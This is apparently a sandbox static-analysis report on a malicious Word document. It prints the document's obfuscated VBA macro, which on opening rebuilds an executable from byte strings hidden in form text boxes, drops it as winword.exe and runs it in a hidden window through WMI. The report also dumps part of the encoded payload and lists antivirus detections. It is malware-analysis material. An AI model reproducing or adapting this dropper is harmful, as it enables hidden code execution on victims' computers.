popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Documents.Application.Visible = False

Dim askfjlskdjflkjsdrkljskd() As String
Dim alksdjweoijgskljsl_____() As Byte
askfjlskdjflkjsdrkljskd = Split(UserForm1.TextBox1.Text & UserForm1.TextBox2.Text & UserForm1.TextBox3.Text & UserForm1.TextBox4.Text, "!")
Dim lskjfjiogjnvdfgljwlfjfsf As Double
lskjfjiogjnvdfgljwlfjfsf = 0
For Each tiogjvelrrkjf In askfjlskdjflkjsdrkljskd
        ReDim Preserve alksdjweoijgskljsl_____(lskjfjiogjnvdfgljwlfjfsf)
        alksdjweoijgskljsl_____(lskjfjiogjnvdfgljwlfjfsf) = CByte(tiogjvelrrkjf)
        lskjfjiogjnvdfgljwlfjfsf = lskjfjiogjnvdfgljwlfjfsf + 1
Next
SaveBinaryData UserForm2.TextBox1.Text, alksdjweoijgskljsl_____
Dim woituklkreltjlsjldkfjsldkjftoiu
Set woituklkreltjlsjldkfjsldkjftoiu = CreateObject(UserForm2.TextBox3.Text)
woituklkreltjlsjldkfjsldkjftoiu.MoveFile UserForm2.TextBox1.Text, UserForm2.TextBox2.Text
Const HIDDEN_WINDOW = 12
strComputer = "."
Set objWMIService = GetObject("wi" + "nm" + "gm" + "ts:{impe" + "rs" + "onati" + "onLeve" + "l=imp" + "erso" + "nate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get(UserForm2.TextBox5.Text)
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject(UserForm2.TextBox6.Text)
errReturn = objProcess.create(UserForm2.TextBox2.Text, Null, objConfig, intProcessID)
End Sub
Function SaveBinaryData(FileName, ByteArray)
  Const adTypeBinary = 1
  Const adSaveCreateOverWrite = 2
  Dim BinaryStream
  Set BinaryStream = CreateObject(UserForm2.TextBox7.Text)
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.Write ByteArray
  BinaryStream.SaveToFile FileName, adSaveCreateOverWrite
End Function

Deobfuscated

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Documents.Application.Visible = False

Dim askfjlskdjflkjsdrkljskd() As String
Dim alksdjweoijgskljsl_____() As Byte
askfjlskdjflkjsdrkljskd = Split(UserForm1.TextBox1.Text & UserForm1.TextBox2.Text & UserForm1.TextBox3.Text & UserForm1.TextBox4.Text, "!")
Dim lskjfjiogjnvdfgljwlfjfsf As Double
lskjfjiogjnvdfgljwlfjfsf = 0
For Each tiogjvelrrkjf In askfjlskdjflkjsdrkljskd
        ReDim Preserve alksdjweoijgskljsl_____(lskjfjiogjnvdfgljwlfjfsf)
        alksdjweoijgskljsl_____(lskjfjiogjnvdfgljwlfjfsf) = CByte(tiogjvelrrkjf)
        lskjfjiogjnvdfgljwlfjfsf = lskjfjiogjnvdfgljwlfjfsf + 1
Next
SaveBinaryData UserForm2.TextBox1.Text, alksdjweoijgskljsl_____
Dim woituklkreltjlsjldkfjsldkjftoiu
Set woituklkreltjlsjldkfjsldkjftoiu = CreateObject(UserForm2.TextBox3.Text)
woituklkreltjlsjldkfjsldkjftoiu.MoveFile UserForm2.TextBox1.Text, UserForm2.TextBox2.Text
Const HIDDEN_WINDOW = 12
strComputer = "."
Set objWMIService = GetObject("wi" + "nm" + "gm" + "ts:{impe" + "rs" + "onati" + "onLeve" + "l=imp" + "erso" + "nate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get(UserForm2.TextBox5.Text)
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject(UserForm2.TextBox6.Text)
errReturn = objProcess.create(UserForm2.TextBox2.Text, Null, objConfig, intProcessID)
End Sub
Function SaveBinaryData(FileName, ByteArray)
  Const adTypeBinary = 1
  Const adSaveCreateOverWrite = 2
  Dim BinaryStream
  Set BinaryStream = CreateObject(UserForm2.TextBox7.Text)
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.Write ByteArray
  BinaryStream.SaveToFile FileName, adSaveCreateOverWrite
End Function

Original

                                        Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{5B65C132-099A-4D07-8AD5-E8AF1A6543B9}{7369360D-ED7A-4B12-8C65-F03E794A3190}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Private Sub TextBox2_Change()

End Sub

Deobfuscated

                                        Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{5B65C132-099A-4D07-8AD5-E8AF1A6543B9}{7369360D-ED7A-4B12-8C65-F03E794A3190}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Private Sub TextBox2_Change()

End Sub

Original

                                        Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{693F2F95-F335-4EFF-A200-65A3A493FB51}{42216B07-9C44-4BA7-A6EF-8684F66A93B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Private Sub TextBox2_Change()

End Sub

Private Sub TextBox4_Change()

End Sub

Private Sub TextBox7_Change()

End Sub

Deobfuscated

                                        Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{693F2F95-F335-4EFF-A200-65A3A493FB51}{42216B07-9C44-4BA7-A6EF-8684F66A93B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Private Sub TextBox2_Change()

End Sub

Private Sub TextBox4_Change()

End Sub

Private Sub TextBox7_Change()

End Sub
bjbjb3b3
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
1Ccc!R
pYlnPaoa
ou>U5{
#_Yc9
[Nlm}G
J>bQJq
H|R0em
U*W^e(=
~X[^j
\F{U`iV
evHY~^
|"{X#U
wgiV<
4{9u-A<g
^sWn0
:_n8_-
9VWII+
W1*r>ve7-U<g
T]Y!vw
"e^rjRm
kTtU:P
kHo 2l
Is;KowV
pv:uU;+>
K{8,vx@
exjN1IF
jKy%gm
5-wNH&
9<u*KvWw
!aey}j
Equ*>|
*$1$yNwglJ
-59<Ku
:vIF|2
Vs24q,smwL
k[%k-{
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
PxzSq]y<u
b!e9#i
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Chinto
Normal.dotm
Allen Murphy
Microsoft Office Word
SaveBinaxryD
woituk@lkrelt@
teObjec'L&
veFi@}EQ
HIDDEN_@WINDOW
objWMI Servib
"wi" +P "nm
s:{impeb
\root\ci
xf#5Bn
@!f,igc
I@$ance_
Window
Proces.s
rReturn
Null,
, int
nArray
eOverWri
= @G
_7E#
ts:{impe
onLeve
nate}!\\
\root\cimv2
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Customliz
_Op@en()
.Applica
tion.Vis
kfjlskdj
flkjsdrk
() As$ S
sdjweoijdgs
Ct@(UserF
.TextBox
ogjnvdfg
ljwlfjfs"f
+ Each
velrrkjf
Attribut
e VB_Nam
e = "Use
rForm1"
5B65C132
-099A-4D
07-8AD5-
E8AF1A65
43B9}{73
69360D-E
JB12-8
C65-F03E
794A3190
dGlobal!
Pre decla
plateDer
Custohmiz
Sub Text
Box1_Cha
Attribut
e VB_Nam
e = "Use
rForm2"
693F2F95
-F335-4E
FF-A200-@65A3A4
51}{4221
6B07-9C4
4-4BA7-A
6EF-8684
F66A93B1
dGlobal!
Pre decla
plateDer
Custohmiz
Sub Text
Box1_Cha
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\SysWOW6
e2.tlb
#OLE Aut
omation
ENormal
! Offic
!G{2DF8
D04C-5BF
A-101B-BHDE5
Files (
x86)\Com
rosoft S
hared\OF
FICE16\M
SO.DLL#
P 16.0 O
Libra,ry
zMSBF@Cs>
EE1-E08F
608C4D0B
eFM20L'
BE911453
-AD68-41
99-B4A8-
C2B6FFFD
rs\ALLEN
M~1\AppD
ata\Loca
l\Temp\V
hisDocum@entG
*\CNormalrU
ThisDocument
UserForm1
UserForm2
Project
C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files (x86)\Microsoft Office\root\Office16\MSWORD.OLB
C:\Windows\SysWOW64\stdole2.tlb
stdole
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
C:\Windows\SysWOW64\FM20.DLL
MSForms
C:\Users\ALLENM~1\AppData\Local\Temp\VBE\MSForms.exd
Document
Document_Open
SaveBinaryData
UserForm
F3Dynamic
TextBox1
Win64x
Project-
stdole
Normal
Office
MSFormsC
ThisDocument<
_Evaluate
Document_Open
Documents
Application
Visible
askfjlskdjflkjsdrkljskd
alksdjweoijgskljsl_____.
UserForm1)
TextBox1
TextBox2
TextBox3
TextBox4
lskjfjiogjnvdfgljwlfjfsf
tiogjvelrrkjfCz
SaveBinaryDatah
UserForm2*
woituklkreltjlsjldkfjsldkjftoiu
CreateObject
MoveFilew
HIDDEN_WINDOW
strComputer
objWMIService
GetObjectz
objStartup
TextBox5
objConfigE
SpawnInstance_a
ShowWindowJk
objProcess
TextBox6
errReturn
create
intProcessIDH
FileNamej
ByteArray
adTypeBinary
adSaveCreateOverWrite
BinaryStream
TextBox7
SaveToFile
TextBox1_Change=
TextBox2_Change
TextBox4_Change
TextBox7_Change
Documentj
UserFormN
Change
_B_var_tiogjvelrrkjf
_B_var_strComputerD
_B_var_objWMIService}G
_B_var_objStartup
_B_var_objConfig
_B_var_objProcess
_B_var_intProcessID
_B_var_errReturnF
TextBox2
TextBox3
TextBox4
TextBox1_Change
TextBox2_Change
TextBox7
TextBox5
TextBox6
TextBox4_Change
TextBox7_Change
VBE7.DLL
FileName
ByteArray
Tahoma
TextBox1
TextBox2k
TextBox3
TextBox4k
Microsoft Forms 2.0 Form
Embedded Object
VERSION 5.00
Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm1
Caption = "UserForm1"
ClientHeight = 6480
ClientLeft = 120
ClientTop = 465
ClientWidth = 8880
StartUpPosition = 1 'CenterOw
77!90!144!0!3!0!0!0!4!0!0!0!255!255!0!0!184!0!0!0!0!0!0!0!64!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!128!0!0!0!14!31!186!14!0!180!9!205!33!184!1!76!205!33!84!104!105!115!32!112!114!111!103!114!97!109!32!99!97!110!110!111!116!32!98!101!32!114!117!110!32!105!110!32!68!79!83!32!109!111!100!101!46!13!13!10!36!0!0!0!0!0!0!0!80!69!0!0!76!1!3!0!173!238!72!97!0!0!0!0!0!0!0!0!224!0!46!1!11!1!48!0!0!226!19!0!0!24!5!0!0!0!0!0!14!1!20!0!0!32!0!0!0!32!20!0!0!0!64!0!0!32!0!0!0!2!0!0!4!0!0!0!0!0!0!0!6!0!0!0!0!0!0!0!0!96!25!0!0!2!0!0!0!0!0!0!2!0!96!133!0!0!16!0!0!16!0!0!0!0!16!0!0!16!0!0!0!0!0!0!15!0!0!0!0!0!0!0!0!0!0!0!192!0!20!0!75!0!0!0!0!32!20!0!228!20!5!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!64!25!0!12!0!0!0!127!0!20!0!28!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!0!32!0!0!8!0!0!0!0!0!0!0!0!0!0!0!8!32!0!0!72!0!0!0!0!0!0!0!0!0!0!0!46!116!101!120!116!0!0!0!20!225!19!0!0!32!0!0!0!226!19!0!0!2!0!0!0!0!0!0!0!0!0!0!0!0!0!0!32!0!0!96!46!114!115!114!99!0!0!0!
Tahoma
110!84!121!112!101!0!73!77!101!116!114!111!67!111!109!112!111!110!101!110!116!0!77!101!116!114!111!70!114!97!109!101!119!111!114!107!46!73!110!116!101!114!102!97!99!101!115!0!77!101!116!114!111!83!116!121!108!101!69!120!116!101!110!100!101!114!0!77!101!116!114!111!70!114!97!109!101!119!111!114!107!46!67!111!109!112!111!110!101!110!116!115!0!67!111!109!112!111!110!101!110!116!0!83!121!115!116!101!109!46!67!111!109!112!111!110!101!110!116!77!111!100!101!108!0!77!101!116!114!111!83!116!121!108!101!77!97!110!97!103!101!114!0!77!101!116!114!111!84!111!111!108!84!105!112!0!84!111!111!108!84!105!112!0!83!121!115!116!101!109!46!87!105!110!100!111!119!115!46!70!111!114!109!115!0!73!77!101!116!114!111!67!111!110!116!114!111!108!0!77!101!116!114!111!66!117!116!116!111!110!0!77!101!116!114!111!70!114!97!109!101!119!111!114!107!46!67!111!110!116!114!111!108!115!0!66!117!116!116!111!110!0!77!101!116!114!111!67!104!101!99!107!66!111!120!0!67!104!101!99!107!66!111!120!0!77!101!116!114!111!67!111!109!98!111!66!111!120!0!67!11
Tahoma
215!145!23!77!76!122!38!88!230!253!152!7!63!9!104!233!225!138!208!238!249!182!255!42!193!116!75!225!156!11!4!183!231!202!55!6!175!40!115!239!96!248!73!168!247!99!50!103!253!230!139!227!22!89!15!161!5!9!200!12!128!192!226!121!73!76!49!189!114!33!7!67!47!19!14!215!229!205!221!218!142!251!220!70!12!7!46!226!159!170!170!107!177!6!70!162!219!38!228!87!226!140!127!112!234!220!17!38!100!136!32!9!209!36!101!112!140!171!193!179!29!164!65!94!192!63!25!186!94!115!209!158!100!4!63!3!90!175!132!232!20!187!119!135!227!188!31!16!23!40!62!189!0!95!142!128!172!117!156!160!146!139!3!98!142!253!140!172!145!50!18!55!195!66!67!132!77!246!115!8!69!212!128!221!245!161!147!107!4!126!234!128!15!12!98!166!105!158!214!191!171!21!164!38!153!13!122!179!23!244!115!9!62!14!246!52!51!5!39!11!150!214!130!139!35!29!117!111!169!9!129!151!224!89!145!181!151!205!41!34!83!182!106!173!91!195!160!87!161!180!161!238!219!106!106!49!195!51!91!176!115!96!110!22!35!183!120!203!139!35!126!137!169!146!224!77!66!32!173!38!85!91!249!104!214!53!36!158!236!19
Tahoma
20!163!163!232!71!161!103!90!143!154!72!231!144!84!104!72!25!253!146!69!107!219!79!95!58!0!50!151!243!179!5!239!148!181!217!165!79!99!95!212!174!194!65!186!197!58!175!54!50!80!86!14!123!175!184!194!33!158!199!234!22!163!199!35!13!19!37!1!54!174!182!71!33!178!4!112!152!152!38!115!3!45!27!102!220!240!125!51!150!21!91!224!162!99!115!155!83!31!193!240!18!47!2!174!133!35!246!4!193!105!23!92!3!103!60!18!27!106!191!88!60!22!250!203!80!219!207!51!125!97!186!29!106!183!40!26!96!192!93!46!159!120!117!56!211!25!150!132!213!27!192!73!64!159!215!219!130!11!201!165!58!164!146!112!53!113!81!238!146!107!89!173!107!167!175!171!34!20!225!238!132!49!111!190!1!121!157!135!138!133!93!1!170!69!213!104!89!24!17!187!73!50!1!6!231!32!14!125!76!175!138!51!120!65!25!217!103!50!169!226!14!5!48!194!143!235!213!242!210!106!33!10!240!0!17!53!71!27!50!36!229!187!65!162!21!7!74!196!110!33!113!128!165!86!150!213!224!236!109!251!188!199!67!150!60!138!39!254!21!100!43!119!18!134!96!89!151!226!216!228!119!108!150!152!47!11!149!109!8!205!119!30!1
Tahoma
TypeInfoVer = 4
Tahoma
TextBox1
C:\Users\Public\Pictures\winword.con
Tahoma
C:\Users\Public\Pictures\winword.exe
Tahomae
Scripting.FileSystemObject
Tahoma
winmgmts:{impersonationLo
evel=impersonate}!\\" & strComputer & "\root\cimv2}
Tahoma
Win32_ProcessStartup
Tahoma
winmgmts:root\cimv2:Win32_Process
Tahoma
ADODB.Stream
Tahoma
TextBox2
TextBox3
TextBox4
TextBox5
TextBox6
TextBox7
Microsoft Forms 2.0 Form
Embedded Object
VERSION 5.00
Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm2
Caption = "UserForm2"
ClientHeight = 5535
ClientLeft = 120
ClientTop = 465
ClientWidth = 7920
StartUpPosition = 1 'CenterOwner
TypeInfoVer = 7
ThisDocument
UserForm1
UserForm2
ID="{00000000-0000-0000-0000-000000000000}"
Document=ThisDocument/&H00000000
Package={AC9F2F90-E877-11CE-9F68-00AA00574A4F}
BaseClass=UserForm1
BaseClass=UserForm2
HelpFile=""
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="F4F65810B8C6BCC6BCC2C0C2C0"
DPB="A6A40AE20E26DD43DD4322BDDE43A70P
7ED54E5E7EBD176C1601D2FF24E97ED9DABF0C1BA4A3F6D"
GC="585AF407F507F507"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
UserForm1=0, 0, 0, 0, C, 26, 26, 1154, 503, C
UserForm2=104, 104, 1072, 556, C, 52, 52, 1180, 529,
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Untitled
Normal
Default Paragraph Font
Table Normal
No List
Unknown
Times New Roman
Symbol
Calibri
Calibri Light
Cambria Math
Chinto
Allen Murphy
Root Entry
1Table
WordDocument
SummaryInformation
DocumentSummaryInformation
Macros
ThisDocument
__SRP_2
__SRP_3
UserForm1
sDocument
*\R0*#17
.\..\..\..\..\
0{5B65C132-099A-4D07-8AD5-E8AF1A6543B9}{7369360D-ED7A-4B12-8C65-F03E794A3190}
(1Normal.ThisDocument
$*\Rffff*0663403092
*\R0*#17
$*\Rffff*0<63403093
*\R0*#f
*\G{AC2DE821-36A2-11CF-8053-00AA006009FA}#2.0#0#..\..\..\..\..\..\Windows\SysWOW64\FM20.DLL\2#Microsoft Forms 2.0 Object Library*#44
$*\Rffff*0;63403093
*\R1*#c0
*\R1*#c5
*\R1*#c1
*\R1*#17b
$*\Rffff*0;63403093
__SRP_4
__SRP_5
UserForm2
__SRP_6
0{693F2F95-F335-4EFF-A200-65A3A493FB51}{42216B07-9C44-4BA7-A6EF-8684F66A93B1}
$*\Rffff*0<63403093
__SRP_7
_VBA_PROJECT
__SRP_0
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-B
WOW64\FM20.DLL#Microsoft
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files (x86)\Microsoft Office\root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\SysWOW64\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{BE911453-AD68-4199-B4A8-C2B6FFFD786D}#2.0#0#C:\Users\ALLENM~1\AppData\Local\Temp\VBE\MSForms.exd#Microsoft Forms 2.0 Object Library
ThisDocument
0663403092
ThisDocument
UserForm1
0;63403093
UserForm1
UserForm2
0<63403093
UserForm2
MoveFile
ts:{impe
onLeve
nate}!\\
\root\cimv2
SpawnInstance_
ShowWindow
create
SaveToFilep
__SRP_1
UserForm1
CompObj
VBFrame
UserForm2
CompObj
VBFrame
PROJECTwm
tThisDocument
1UserForm1
2UserForm2
PROJECT
CompObj
Antivirus Signature
Bkav Clean
Lionic Trojan.MSWord.Generic.4!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu VBA.Trojan-Downloader.Agent.bti
Cyren Clean
Symantec Trojan.Gen.2
ESET-NOD32 Clean
TrendMicro-HouseCall TROJ_FRS.VSNTIO21
Avast Clean
Cynet Clean
Kaspersky UDS:Trojan.MSOffice.Alien.gen
BitDefender VB.Heur.EmoDldr.32.CD6503CE.Gen
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan VB.Heur.EmoDldr.32.CD6503CE.Gen
Rising Clean
Ad-Aware VB.Heur.EmoDldr.32.CD6503CE.Gen
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.OLE2.Downloader.tx
FireEye VB.Heur.EmoDldr.32.CD6503CE.Gen
Emsisoft VB.Heur.EmoDldr.32.CD6503CE.Gen (B)
SentinelOne Static AI - Malicious OLE
GData VB.Heur.EmoDldr.32.CD6503CE.Gen
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit HEUR.VBA.CG.2
ViRobot Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/Phonzy.C!ml
TACHYON Suspicious/W97M.Obfus.Gen.6
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
ALYac VB.Heur.EmoDldr.32.CD6503CE.Gen
MAX malware (ai score=82)
VBA32 Clean
Zoner Probably Heur.W97Obfuscated
Tencent Clean
Yandex Clean
Ikarus Win32.Outbreak
MaxSecure Clean
Fortinet Clean
Panda Clean
No IRMA results available.